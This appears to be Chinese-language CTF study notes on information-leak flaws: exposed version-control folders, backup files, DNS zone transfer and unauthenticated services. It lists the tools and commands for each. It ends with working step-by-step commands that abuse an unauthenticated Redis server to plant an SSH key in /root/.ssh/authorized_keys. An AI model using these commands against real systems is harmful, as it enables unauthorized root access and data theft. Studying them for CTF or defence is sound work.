zoukankan      html  css  js  c++  java
  • CTF之信息泄漏

    web源码泄漏

    .hg源码泄漏:

    漏洞成因:hg  init的时候会生成.hg,http://www.xx.com/.hg/,

    工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)

    .git源码泄漏:

    漏洞成因:在运行git init初始化代码库的时候,会在当前目录下产生一个.git的隐藏文件,用来记录代码的变更记录等,没有删除这个文件,导致泄漏,http://www.xxx.com/.git/config

    工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)

    .DS_Store源码泄漏:

    漏洞成因:在发布代码时,没有删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息,http://www.xxx.com/.ds_store

    工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)

    网站备份压缩文件:

    在网站的使用过程中,往往需要对网站中的文件进行修改,升级,此时就需要对网站整或其中某一页面进行备份,当备份文件或修改过程中的缓存文件因为各种原因被留在网站web目录下,而该目录又没有设置访问权限,就有可能导致备份文件被下载,导致信息泄漏,给服务器安全埋下隐患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,

    工具:可以使用一些扫描软件,进行扫描,如awvs之类的

    像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php来读取文件

    SVN导致文件泄漏:

    版本控制系统

    工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)

    应用层泄漏

    DNS域传送:

    dns服务器的主备数据同步,使用的是域传送功能,如果使用默认配置文件进行配置,就会存在dns域传送漏洞(不手动添加allow-transfer)

    工具:dig @1.1.1.1 xxx.com axfr (会泄漏一些信息)

    HeartBleed:

    利用https

    从堆栈错误泄漏到RCE:

    利用报错,泄漏信息,利用函数try{....}catche(e){e.printstack;}

    未授权访问漏洞:

    未授权访问----应用层服务的问题,服务启动后,没配置任何凭证,导致可以直接进入

    弱口令---配置的密码过于简单常见

    空口令---没配置密码

    目前主要存在未授权访问漏洞的如下:

    NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,

    ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,这些都是挖矿勒索的高发地带

    如:

    redis为授权访问漏洞,默认情况下会绑定在0.0.0.0:6379,这样会将redis服务暴露到公网上,如果没有开启认证的情况下,可以导致任意用户可以访问目标服务器,可以利用相关方法,在redis服务器上写入公钥,进而可以使用对应私钥直接登陆目标服务器。

    1.本地生成公钥私钥

    ssh-keygen -t rsa

    2.把公钥写入xx.txt文件

    (echo -e " ";cat id_rsa.pub;echo -e " ") > xx.txt

    3.连接redis写入文件

    cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit

    redis-cli -h 192.168.1.2

    192.168.1.2:6379> config set dir /root/.ssh/

    192.168.1.2:6379> config get dir

    1)"dir"

    2)"/root/.ssh"

    192.168.1.2:6379> config set dbfilename "authorized_keys"

    192.168.1.2"6379> save

    也可以使用msf里面成熟的exp来利用

    友情链接  http://www.cnblogs.com/klionsec

                    http://www.cnblogs.com/l0cm

                    http://www.cnblogs.com/Anonyaptxxx

                    http://www.feiyusafe.cn

  • 相关阅读:
    linux上部署docker+tomcat服务,并部署项目
    docker使用Dockerfile把springboot项目jar包生成镜像并运行
    springboot配置log4j
    mysql常用函数
    java处理csv文件上传示例
    中国城市区号脚本-mysql
    java微信公众号支付示例
    java导出csv格式文件
    mysql时间相加函数DATE_ADD()
    centos分区
  • 原文地址:https://www.cnblogs.com/Hydraxx/p/10762512.html
Copyright © 2011-2022 走看看